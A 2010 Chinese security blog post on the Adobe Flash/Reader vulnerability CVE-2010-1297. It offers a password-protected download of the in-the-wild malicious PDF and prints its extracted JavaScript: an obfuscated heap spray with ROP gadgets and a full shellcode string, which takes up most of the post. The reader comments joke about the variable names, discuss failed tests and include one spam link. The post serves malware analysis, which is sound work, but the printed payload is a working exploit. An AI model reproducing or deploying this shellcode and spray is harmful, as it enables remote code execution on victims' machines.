上一篇 | 这是最后一篇日志下一篇
漏洞公告 订阅所有漏洞公告的日志

CVE-2010-1297那个Adobe洞的内幕

作者:friddy 日期:2010-06-09

字体大小:

Adobe近日发布了一个安全公告,称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞,该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统,Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案,但Flash Player 10.1 Release Candidate不受此漏洞影响,用户可下载使用或采取以下临时解决方案,以避免受到漏洞威胁。


================================================================

pdf样本(解压密码friddy):

点击下载此文件

=======================================================================

解出里面的javascript,看起来此次“并非国人所为”:

各位看客请仔细看!~~!特别注意“第四行”

var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("0c0c0c0c49190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700a16400300000408b8b0c1c708bad087034e900025800ec8102000000fc8b77898908104777ff680897ec0c03c4e8000189001c4777ff680822f67cb9b4e800018900204777ff680817a57c00a4e800018900244777ff680897fb0ffd94e800018900284777ff6808651610fa84e8000189002c4777ff6808791fe80a74e800018900304777ff6808b025c2ff64e800018900344777ff680808ac76da54e800018900384777ff6808fe980e8a44e8000189003c4777ff6808897499ec34e800018900404777ff6808b98378b524e800018900444777ff68089baddf7d14e800018900484777ffff103457f6338d466047565057ff8348fff8f274003d0010760089eb04477789ff600477406a57ff891c5c47006a006a006a77ffff603857f88374ff6a4b8d00705fff53047777ffff5c607757ff8b2c704fe9838b105c47814046385a2e756881090478062319810474ece21aebc0838908144781404a386375754b81090478011219830e74ece277ffff5c2057850fff72ffffc08389081847006a806800006a006a026a0068000000400077ffff1024574789c7646c475a4d0090006a5f8d5370046a5f8d536c77ffff643057478b2b181447e8838b08145f03304843f88375006af78d00705f8b53185f5f2b831408ebff53147777ffff64305777ffff642857006a77ffff103c5766eb90905590ec8b8b57087d5d8b560c738b8b3c1e74037856f3768b032033f349c9ad41c30333560ff610bef23a0874cec1030d40f2f1ebfe3b755e5ae5eb8b5a8b032466dd0c8b8b4b1c5add03048b038b5ec55d5f08c2e800fdc7ffff3a632d5c652e65789000006aff6a57ff9044"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();

扩展阅读:

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html



[本日志由 friddy 于 2010-06-09 08:55 AM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
评论: 7 | 引用: 0 | 查看次数: 1711
回复回复df[2010-07-13 05:58 PM | del]
嘿嘿。。。。sb="TMD,[CAO,MM";
回复回复中国最大的购物导航[2010-07-03 11:53 PM | del]
中国最大的购物导航www.178wzlt.com



中国最大的购物导航 www.178wzlt.com
回复回复sdh[2010-06-13 11:53 AM | del]
楼上有成功的吗?
回复回复mad[2010-06-11 09:08 AM | del]
此洞测试了3个虚拟机,都没成功
回复回复68353982[2010-06-11 06:02 AM | del]
你要是在认真一点的看。就能看到更靓的点。哎~我不相信上面那个是你分析的~~~因为你没看到最靓的那个点!
回复回复马甲2[2010-06-11 00:27 AM | del]
肯定是国人所为,看看内嵌的那个exe所释放的dll就知道了,里面那么多的中文简体提示。
回复回复马甲[2010-06-09 10:11 AM | del]
变量名是亮点,果然“不是”国人所为。。。
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭